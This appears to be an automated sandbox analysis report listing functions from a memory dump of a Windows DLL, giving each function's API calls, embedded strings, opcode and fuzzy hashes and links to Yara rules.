Uniqueness

Uniqueness Score: -1.00%

Function 6E4DBE31, Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 338COMMON

Download Yara Rule

APIs

Part of subcall function 6E4DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E4CED16,6E4FD0A0,0000000C,00000004,00000001,00000004,?,6E4B4865,00000000,00000000), ref: 6E4DA298
Part of subcall function 6E4DA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E4B4865,00000000,00000000), ref: 6E4DA33C
Part of subcall function 6E4DA294: _abort.LIBCMT ref: 6E4DA342

_memcmp.LIBVCRUNTIME ref: 6E4DC0DB
_free.LIBCMT ref: 6E4DC14C
_free.LIBCMT ref: 6E4DC165
_free.LIBCMT ref: 6E4DC197
_free.LIBCMT ref: 6E4DC1A0
_free.LIBCMT ref: 6E4DC1AC
GetStartupInfoW.KERNEL32(?), ref: 6E4DC209
GetFileType.KERNEL32(?,6E4DB318,?,00000004), ref: 6E4DC272

Strings

;\Ln, xrefs: 6E4DC129
C, xrefs: 6E4DBF99

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast$FileInfoStartupType_abort_memcmp
String ID: ;\Ln$C
API String ID: 1665419104-2938799140
Opcode ID: 953c1d94eb9c8c4b43946fb9116ddc39a77c2b1fded3cc92ebfb6b571fa7132e
Instruction ID: b90c6e2b5852618d8a5cbeec13d9fb5ca216e29a8caa5d3909d3a156dad47ea5
Opcode Fuzzy Hash: 953c1d94eb9c8c4b43946fb9116ddc39a77c2b1fded3cc92ebfb6b571fa7132e
Instruction Fuzzy Hash: 29D16A35A0121A9FDB24DFA8C8A4E9DB3B4FF49304F1045AEE949A7354D731AE84CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6E4BF070, Relevance: 16.9, APIs: 11, Instructions: 353stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6E4BEEB0: CharNextW.USER32(?,?,00000000,?,C000008C,00000001,?,49F8414E,00000000,00000000), ref: 6E4BEEEE
Part of subcall function 6E4BEEB0: CharNextW.USER32(00000000,?,?,00000000), ref: 6E4BEF1B
Part of subcall function 6E4BEEB0: CharNextW.USER32(745EEEF0,?,?,00000000), ref: 6E4BEF34
Part of subcall function 6E4BEEB0: CharNextW.USER32(745EEEF0,?,?,00000000), ref: 6E4BEF3F
Part of subcall function 6E4BEEB0: CharNextW.USER32(00000001,?,?,00000000), ref: 6E4BEFAE

lstrcmpiW.KERNEL32(?,6E4F8A28,?,49F8414E,C000008C,00000000,?,?,00000000,6E4E9BA6,000000FF,?,6E4C00F7,00000000,00000000,C000008C), ref: 6E4BF0F3
lstrcmpiW.KERNEL32(?,6E4F8A2C,?,6E4C00F7,00000000,00000000,C000008C,C000008C), ref: 6E4BF10A

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$lstrcmpi
String ID:
API String ID: 3586774192-0
Opcode ID: d2ca748a0bea9bb18f3ba99f23bbb6a4f6909e54438039afb3f4859d28f78b4a
Instruction ID: 7c52e7eece55a8021c8c3dc32d55e70f735e45fabc7c9f6671ba1b19330ac896
Opcode Fuzzy Hash: d2ca748a0bea9bb18f3ba99f23bbb6a4f6909e54438039afb3f4859d28f78b4a
Instruction Fuzzy Hash: 4BD1C179901219DADB25CFB8CC48FD9B3B9AF58304F11049AEA0DA7241DB70AE55CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B5570, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

__Getcvt.LIBCPMT ref: 6E4B55AE
__Getcvt.LIBCPMT ref: 6E4B55D3

Strings

true, xrefs: 6E4B5669
false, xrefs: 6E4B5630

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Getcvt
String ID: false$true
API String ID: 1921796781-2658103896
Opcode ID: 558d0f8eaf4f67b4ee84decb997d968844cfa7186d4e8ac74977aa255e7c28db
Instruction ID: cbcb5fe9270d5cca62c221e54e7f7f8981b69968eec3090f274013d6d9a49077
Opcode Fuzzy Hash: 558d0f8eaf4f67b4ee84decb997d968844cfa7186d4e8ac74977aa255e7c28db
Instruction Fuzzy Hash: FF514735A042459FDB10CFB4C840FAABBBAEB85714F14859FD9485B385C77AA901CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C1130, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107timeCOMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 6E4C1148
GetDeviceCaps.GDI32(00000000,0000005A), ref: 6E4C1175
MulDiv.KERNEL32(00000008,00000000), ref: 6E4C117E
CreateFontW.GDI32(00000000), ref: 6E4C1187
ReleaseDC.USER32 ref: 6E4C1194
SetTimer.USER32(?,000003E8,000003E8,00000000), ref: 6E4C11A9

Part of subcall function 6E4C2460: BeginPaint.USER32(?,?), ref: 6E4C24A3
Part of subcall function 6E4C2460: GetParent.USER32(?), ref: 6E4C24AC
Part of subcall function 6E4C2460: GetClientRect.USER32 ref: 6E4C24C2
Part of subcall function 6E4C2460: CreateCompatibleDC.GDI32(?), ref: 6E4C24C8
Part of subcall function 6E4C2460: CreateCompatibleBitmap.GDI32(?,?,?), ref: 6E4C24EA
Part of subcall function 6E4C2460: SelectObject.GDI32(00000000,00000000), ref: 6E4C24F6
Part of subcall function 6E4C2460: SelectObject.GDI32(00000000,?), ref: 6E4C2508
Part of subcall function 6E4C2460: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6E4C2521
Part of subcall function 6E4C2460: SendMessageW.USER32(?,0000000F,?,00000000), ref: 6E4C252F
Part of subcall function 6E4C2460: SetBkMode.GDI32(?,00000001), ref: 6E4C2538
Part of subcall function 6E4C2460: SetTextColor.GDI32(?,00FFFFFF), ref: 6E4C2544
Part of subcall function 6E4C2460: GetClientRect.USER32 ref: 6E4C2556
Part of subcall function 6E4C2460: ClientToScreen.USER32(?,?), ref: 6E4C2564
Part of subcall function 6E4C2460: ClientToScreen.USER32(?,?), ref: 6E4C2579
Part of subcall function 6E4C2460: ClientToScreen.USER32(?,?), ref: 6E4C259B

DeleteObject.GDI32(?), ref: 6E4C11D0

Strings

Arial, xrefs: 6E4C114E

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Client$CreateObjectScreen$CompatibleMessageRectSelectSend$BeginBitmapCapsColorDeleteDeviceFontModePaintParentReleaseTextTimer
String ID: Arial
API String ID: 1525433823-493054409
Opcode ID: d4d1220e9023cb36dba3e8e84dd78036a19cba27a732b99e12e8886a4f804b42
Instruction ID: 06a87f63f6e307d4089ab90eed852f9a104e136fec197c7a60090827a7b871e9
Opcode Fuzzy Hash: d4d1220e9023cb36dba3e8e84dd78036a19cba27a732b99e12e8886a4f804b42
Instruction Fuzzy Hash: 7031DE71200706ABEB60AFB8DC49FAA7BA8FF45711F004112F505DB291CBB5F865CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DA174, Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E4DA188

Part of subcall function 6E4D9B98: HeapFree.KERNEL32(00000000,00000000,?,6E4D731A,000000FF,000000FF), ref: 6E4D9BAE
Part of subcall function 6E4D9B98: GetLastError.KERNEL32(6E4D6995,?,6E4D731A,000000FF,000000FF), ref: 6E4D9BC0

_free.LIBCMT ref: 6E4DA194
_free.LIBCMT ref: 6E4DA19F
_free.LIBCMT ref: 6E4DA1AA
_free.LIBCMT ref: 6E4DA1B5
_free.LIBCMT ref: 6E4DA1C0
_free.LIBCMT ref: 6E4DA1CB
_free.LIBCMT ref: 6E4DA1D6
_free.LIBCMT ref: 6E4DA1E1
_free.LIBCMT ref: 6E4DA1EF

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bbd9ba51c1963281c5bbd356334cf905515cc323e084f864fdf132160aeb8927
Instruction ID: 4bfca73dff8afc7dc23058696ae2a2f53cd2be5e58ea39fc5993d19b5b94aad0
Opcode Fuzzy Hash: bbd9ba51c1963281c5bbd356334cf905515cc323e084f864fdf132160aeb8927
Instruction Fuzzy Hash: C811CB75510508BFCB01DFA4C860CDD3B69FF06254B5249AAFA089F222DB72DE54DB80

Uniqueness

Uniqueness Score: -1.00%

Function 6E4BE310, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 100libraryloaderregistryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,49F8414E,?,?,?,6E4E9A60,000000FF), ref: 6E4BE349
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 6E4BE359
GetModuleHandleW.KERNEL32(Advapi32.dll,49F8414E,?,?,?,6E4E9A60,000000FF), ref: 6E4BE3B9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 6E4BE3C9
RegDeleteKeyW.ADVAPI32(?,?), ref: 6E4BE418

Strings

RegDeleteKeyExW, xrefs: 6E4BE3C3
Advapi32.dll, xrefs: 6E4BE344, 6E4BE3B4
RegDeleteKeyTransactedW, xrefs: 6E4BE353

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc$Delete
String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
API String ID: 2668475584-1053001802
Opcode ID: a2b7d7abb00a9e56f9d9420f55daece742dbc96fd6197b4589c72ee736752133
Instruction ID: 650632132db4380b7c4fff1e97e541658e9197d443b504d0a38df20ef23ca17d
Opcode Fuzzy Hash: a2b7d7abb00a9e56f9d9420f55daece742dbc96fd6197b4589c72ee736752133
Instruction Fuzzy Hash: A4316D36608749EFDB218FA9D840F55BBA8EB85720F00416FF91597750CB36A050CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B9100, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 73COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6E4B9149
VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 6E4B9171
VariantClear.OLEAUT32(?), ref: 6E4B9189

Part of subcall function 6E4B8E70: SysFreeString.OLEAUT32(?), ref: 6E4B8ECE
Part of subcall function 6E4B8E70: SysAllocString.OLEAUT32(?), ref: 6E4B8F39

_com_issue_error.COMSUPP ref: 6E4B91AF

Strings

counter, xrefs: 6E4B963B, 6E4B9666
name, xrefs: 6E4B9248
value, xrefs: 6E4B93D0
page, xrefs: 6E4B99EB, 6E4B9A16

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$String$AllocChangeClearFreeInitType_com_issue_error
String ID: counter$name$page$value
API String ID: 2722580932-1733285648
Opcode ID: e80c20ec119f1e1dc8a195a1b963d49f86e15e36be5562cd1ccb157b62339ef7
Instruction ID: dc49259cf60db9f591f10ea26ac5f84268e300b05404bddc09e18db2f4921e72
Opcode Fuzzy Hash: e80c20ec119f1e1dc8a195a1b963d49f86e15e36be5562cd1ccb157b62339ef7
Instruction Fuzzy Hash: 71117C75A0460AABDB10DFB4C908FDEB7BCEB49710F20456BE915E3340D735A904CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C829B, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,6E4C85E0,6E500D10,C000008C,?,?,6E4C30BC,?,49F8414E,00000000,00000000,6E4E98D0,000000FF), ref: 6E4C82AD
LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,6E4C85E0,6E500D10,C000008C,?,?,6E4C30BC,?,49F8414E,00000000,00000000), ref: 6E4C82C2
DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,000000FF), ref: 6E4C833E

Strings

AtlThunk_FreeData, xrefs: 6E4C8318
AtlThunk_DataToCode, xrefs: 6E4C8301
atlthunk.dll, xrefs: 6E4C82BD
AtlThunk_InitData, xrefs: 6E4C82EA
AtlThunk_AllocateData, xrefs: 6E4C82D3

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: DecodePointer$LibraryLoad
String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
API String ID: 1423960858-1745123996
Opcode ID: a7572a0c699b1e1bb2be7008021c0281dcad0b6ac36e1210401a901a7963a9e6
Instruction ID: 796ad68d9a6c3fc7ffacf9a9185aa77a3d4adfa29cffcb485a454743b91ef41b
Opcode Fuzzy Hash: a7572a0c699b1e1bb2be7008021c0281dcad0b6ac36e1210401a901a7963a9e6
Instruction Fuzzy Hash: 130122359006117BCA916EF09C40FCA3F885F86A89F000497FC047B3A6FB23BA0681E7

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E128E, Relevance: 13.8, APIs: 9, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f5e3d1df5a84e7caf10e4a52dc6b09bbc5c616323585d364c88e8410b22f947
Instruction ID: 23349a42872d396b130f8ae9e2240afd99fef6320147dc5c6ed03476df65ad8c
Opcode Fuzzy Hash: 7f5e3d1df5a84e7caf10e4a52dc6b09bbc5c616323585d364c88e8410b22f947
Instruction Fuzzy Hash: C1C1C274E4428AAFDB01CFF9C860FEDBBB4AF0A305F04459AE455A7782C7709949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DF447, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,*Ln,6E4CE12A,?,?,?,6E4DF698,00000001,00000001,F9E85006), ref: 6E4DF4A1
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6E4DF698,00000001,00000001,F9E85006,?,?,?), ref: 6E4DF527
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F9E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6E4DF621
__freea.LIBCMT ref: 6E4DF62E

Part of subcall function 6E4D9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E4C8F9C,00000105,000000FF,FFFFFFFF,00000000,?,6E4B1687,?,00000103,000000FF), ref: 6E4D9C04

__freea.LIBCMT ref: 6E4DF637
__freea.LIBCMT ref: 6E4DF65C

Strings

*Ln, xrefs: 6E4DF459

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID: *Ln
API String ID: 1414292761-3273697316
Opcode ID: 422b9f5d20fe90c61ac256a5b2333856724befc2551d4de9283e7c28f75158e1
Instruction ID: 84d152f846baabb5032fba102de892ac7daf42d453d49fc1ce9b8fd61a0ea9b4
Opcode Fuzzy Hash: 422b9f5d20fe90c61ac256a5b2333856724befc2551d4de9283e7c28f75158e1
Instruction Fuzzy Hash: 32511872602206AFEF258EF4CC60EAB77A9EF84754F25462EFD14D6250DB34DC4AC690

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B2120, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6E4B221D

Part of subcall function 6E4C94A7: RaiseException.KERNEL32(?,?,6E4C6476,000000FF,00000000,00000000,FFFFFFFF,?,?,?,?,6E4C6476,000000FF,6E4FCD2C,?,000000FF), ref: 6E4C9507

__CxxThrowException@8.LIBVCRUNTIME ref: 6E4B2262
___std_exception_copy.LIBVCRUNTIME ref: 6E4B228F

Strings

X"Kn, xrefs: 6E4B214D
X"Kn, xrefs: 6E4B213F, 6E4B21D5
ios_base::badbit set, xrefs: 6E4B2227, 6E4B2252, 6E4B2273
ios_base::failbit set, xrefs: 6E4B2135

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw$ExceptionRaise___std_exception_copy
String ID: X"Kn$X"Kn$ios_base::badbit set$ios_base::failbit set
API String ID: 3941765731-4234255262
Opcode ID: 3d088d3d7b320126d5a5d8366e2fb5723a14575dd79d098695629c0b61f6d30f
Instruction ID: 9c95ed235e98831f0a40e0e4707b2a3b8c13145b05efd0f7871f09ee0cfe58ed
Opcode Fuzzy Hash: 3d088d3d7b320126d5a5d8366e2fb5723a14575dd79d098695629c0b61f6d30f
Instruction Fuzzy Hash: A641A075910209AFC704CFF8D840F9EBBACEB49624F148A1FE514EB640DB71A9458BA5

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C9350, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6E4C937B
___except_validate_context_record.LIBVCRUNTIME ref: 6E4C9383
_ValidateLocalCookies.LIBCMT ref: 6E4C9411
__IsNonwritableInCurrentImage.LIBCMT ref: 6E4C943C
_ValidateLocalCookies.LIBCMT ref: 6E4C9491

Strings

;\Ln, xrefs: 6E4C9455
csm, xrefs: 6E4C9426

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: ;\Ln$csm
API String ID: 1170836740-2294048393
Opcode ID: dd79b9efcfb6bf1ff7fcc1bec4cf58cca064d675e9770f9f060e63fe3f30dada
Instruction ID: 09ae806c2ee442b234462fc69b41237b6f593f7b1912a61e7236b9dcf1e7e438
Opcode Fuzzy Hash: dd79b9efcfb6bf1ff7fcc1bec4cf58cca064d675e9770f9f060e63fe3f30dada
Instruction Fuzzy Hash: F741C438A04259EBCF00CFB9C880E9EBBB9AF4571CF10855BD9145B391D736DA06CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DA294, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E4CED16,6E4FD0A0,0000000C,00000004,00000001,00000004,?,6E4B4865,00000000,00000000), ref: 6E4DA298
_free.LIBCMT ref: 6E4DA2EF
_free.LIBCMT ref: 6E4DA323
SetLastError.KERNEL32(00000000,?,?,?,00000000,00000008,000000FF,?,6E4B4865,00000000,00000000), ref: 6E4DA330
SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E4B4865,00000000,00000000), ref: 6E4DA33C
_abort.LIBCMT ref: 6E4DA342

Strings

ios_base::failbit set, xrefs: 6E4DA296

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free$_abort
String ID: ios_base::failbit set
API String ID: 3160817290-3924258884
Opcode ID: 571d3816b29fcf9f8e84ed24263d68476ec3feed314282efc88e22d2d6c0ee86
Instruction ID: d270930ab87430578cc73e004956bf821624c32d6c6f0e7d3cc50df48e766058
Opcode Fuzzy Hash: 571d3816b29fcf9f8e84ed24263d68476ec3feed314282efc88e22d2d6c0ee86
Instruction Fuzzy Hash: AA112B32548E012BDA5126F5BD74EAA372EAFC3A74B240A1FF534D23C4EF31990DA151

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C6698, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E4C669F
std::_Lockit::_Lockit.LIBCPMT ref: 6E4C66A9

Part of subcall function 6E4B19B0: std::_Lockit::_Lockit.LIBCPMT ref: 6E4B19CD
Part of subcall function 6E4B19B0: std::_Lockit::~_Lockit.LIBCPMT ref: 6E4B19E9

codecvt.LIBCPMT ref: 6E4C66E3
std::_Facet_Register.LIBCPMT ref: 6E4C66FA
std::_Lockit::~_Lockit.LIBCPMT ref: 6E4C671A
__CxxThrowException@8.LIBVCRUNTIME ref: 6E4C6738

Strings

;\Ln, xrefs: 6E4C6707

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID: ;\Ln
API String ID: 2594415655-2500737854
Opcode ID: 16708ce177b7e56fc65989889b817de50a8282154b8c2d6ca51a0abd3832c41a
Instruction ID: 6ee7c11219a194861ad5e7f08b71c05bae05f43ea699a2ff4bd64066a629867e
Opcode Fuzzy Hash: 16708ce177b7e56fc65989889b817de50a8282154b8c2d6ca51a0abd3832c41a
Instruction Fuzzy Hash: 50118B799002199BCB01DBF0C850EFD77B86B88B18F15494BE4116B290DF3499048B92

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C83A7, Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,6E4C8550,00000000), ref: 6E4C83CB
HeapAlloc.KERNEL32(00000000), ref: 6E4C83D2

Part of subcall function 6E4C849D: IsProcessorFeaturePresent.KERNEL32(0000000C,6E4C83B9,00000000,?,6E4C8550,00000000), ref: 6E4C849F

InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,6E4C8550,00000000), ref: 6E4C83E2
VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 6E4C8409
RaiseException.KERNEL32(C0000017,00000000,00000000,00000000), ref: 6E4C841D
InterlockedPopEntrySList.KERNEL32(00000000), ref: 6E4C8430
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E4C8443

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
String ID:
API String ID: 2460949444-0
Opcode ID: 09958764a47752c44f407ea708a9e21e2f982714d6cee15b24ddfc2febbce105
Instruction ID: a04af1b448ecd533f16632674ee0150efe029cec2ef562fb7415b7c42ecb8ed5
Opcode Fuzzy Hash: 09958764a47752c44f407ea708a9e21e2f982714d6cee15b24ddfc2febbce105
Instruction Fuzzy Hash: 0E11D33A640E12BBEA211BB69C48F6A766CEB4AB95F010426F905D7244EB60FC0046B6

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C0AC0, Relevance: 10.8, APIs: 7, Instructions: 267COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6E501478,49F8414E), ref: 6E4C0B1D
GetModuleFileNameW.KERNEL32(?,00000104), ref: 6E4C0BA4
LoadTypeLib.OLEAUT32(?,00000000), ref: 6E4C0BD5
LoadRegTypeLib.OLEAUT32(6E4F9538,00000000,00000000,?,00000000), ref: 6E4C0BFD
EnterCriticalSection.KERNEL32(6E501494), ref: 6E4C0DC0
LeaveCriticalSection.KERNEL32(6E501494), ref: 6E4C0DD6

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLoadType$FileLeaveModuleName
String ID:
API String ID: 1976781235-0
Opcode ID: c83de3825bffa9d88713cb160681655030f7552b3ed324352ae1b3da3961e6e5
Instruction ID: c8d02ceb519ed15fe6d5c49c2706fbacca762aebb03dd555fa14aa6cf1169adc
Opcode Fuzzy Hash: c83de3825bffa9d88713cb160681655030f7552b3ed324352ae1b3da3961e6e5
